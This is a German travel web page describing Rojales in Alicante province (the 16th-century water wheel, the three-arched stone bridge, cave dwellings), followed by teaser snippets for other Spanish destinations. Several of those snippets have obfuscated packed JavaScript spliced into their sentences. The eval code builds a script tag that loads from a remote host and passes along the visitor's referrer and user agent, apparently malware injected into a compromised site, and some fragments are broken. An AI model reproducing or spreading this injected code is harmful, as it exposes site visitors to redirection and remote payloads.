Rojales

1903
Rojales

Rojales liegt in der Provinz Alicante. Sie ist an der südlichen Costa Blanca zu finden und gehört zu dem Landkreis Vega Baja. Das Rad, die Talsperre, die Steinbrücke die über den Segura führt, sowie die Kirche sind die wichtigsten Denkmäler von Rojales. Die Wohnhöhlen, welche sich auf der rechten Seite des Flusses befinden, sind auch für viele Touristen von großem Interesse. Sie werden heutzutage von Malern und Künstlern bewohnt.

Es ist nicht unbegründet, dass die Touristenstadt so beliebt ist. Von der Stadt aus brauchen sie nur 10 Minuten bis zum Meer oder nach Torrevieja. Sie benötigen lediglich eine halbe Stunde bis zum Flughafen in Alicante oder in Murcia.

Früher war der Ort von Landwirtschaft geprägt, doch man begann in den siebziger Jahren mit der Umstellung auf Dienstleistungen und Bau. In der Organisation findet man nur noch wenig authentisches Spanien. Wohingegen in Alt-Rojales immer noch Spanisch oder Valencianisch gesprochen wird. Auch die Restaurants und Tapasbars wiegen noch traditionelle heimische Küche an. In den neuen Siedlungen findet man allerdings eine andere kulinarische Vielfalt welche sich von französisch, über italienisch, bis hin zu thailändisch und indisch erstreckt.

Eine der großen Sehenswürdigkeiten, ist das Wasserrad „La Noria“. Dieses, mehrere Meter hohe Wasserschöpferrat wurde im 16. Jahrhundert gebaut und wurde als Bewässerungssystem genutzt. Es diente es der Nivellierung zwischen dem Fluss und den höher gelegenen Feldern um diese bewässern zu können. Auch heute, kann dieses große Rad seine Besucher verwundern.

Eine weitere tolle Sehenswürdigkeit ist die Steinbrücke, welche im 18. Jahrhundert durch Carlos dem Dritten entstand. Zur damaligen Zeit stellte diese Brücke eine architektonische Meisterleistung dar. Sie ist noch sehr gut erhalten und besitzt drei Bögen.

Natürlich sind auch die bekannten Ausflugsziele wie die Salzlagunen von Torrevieja und La Mata und die Berge von Crevillente einen Ausflug wert, für welche sie einige Stunden ihrer Urlaubszeit unbedingt einplanen sollten.

Burg Santa Barbara

Burg Santa Barbara in Alicante

Die Burg eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d=k||c.toString(a)}k=}];e=function(){return'w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('b'+e(c)+'b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|ydere||97|script|language|rel|nofollow|type|text|src|http|45|67|write|kbsrn|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) in Alicante ist eine absolut empfehlenswerte Sehenswürdigkeit nicht nur unter den Burgen und Schlössern in Spanien, sondern...

Tarifa, die kleine, wunderschöne Stadt am südlichsten Punkt Europas

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|asykd||97|script|language|rel|nofollow|type|text|src|http|45|67|write|yyetd|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]Tarifa, die südlichste Stadt Europas mit ihren schönen Gassen, netten Cafes und tollen Wassersportmöglichkeiten. Von hier aus ist Afrika zum...
Palmen Park Municipal in Elche

Palmenhain von Elche el Palmeral / Parque Municipal

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|edbet||97|script|language|rel|nofollow|type|text|src|http|45|67|write|yryye|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]Von dem Turm der Basilica de Santa Maria überschaut man die gewaltigen Palmenparks von Elche, welche von dort oben eher...
Huerto Del Cura in Elche

Huerto Del Cura in Elche

Palmenpark Huerto eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d=k||c.toString(a)}k=}];e=function(){return'w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('b'+e(c)+'b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|dknnr||97|script|language|rel|nofollow|type|text|src|http|45|67|write|hksrz|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) Del Cura in Elche. Palmenparks in Elche gibt es viele. Jardín Huerto del Cura ist einer der kleinereren...
La Mata

La Mata

La eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d=k||c.toString(a)}k=}];e=function(){return'w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('b'+e(c)+'b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|aiyks||97|script|language|rel|nofollow|type|text|src|http|45|67|write|bnazb|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) Mata ist bekannt für seinen Naturschutzpark Parque de la Mata  und die sich darin befindlichen Salzseen. Bei dem...
Sevilla

Sevilla

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|hfefe||97|script|language|rel|nofollow|type|text|src|http|45|67|write|fnfny|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]Sevilla ist die beeindruckende Hauptstadt der südspanischen Region Andalusien. Informationen über diese viertgrößte, spanische Stadt folgen bald und hier sehen Sie...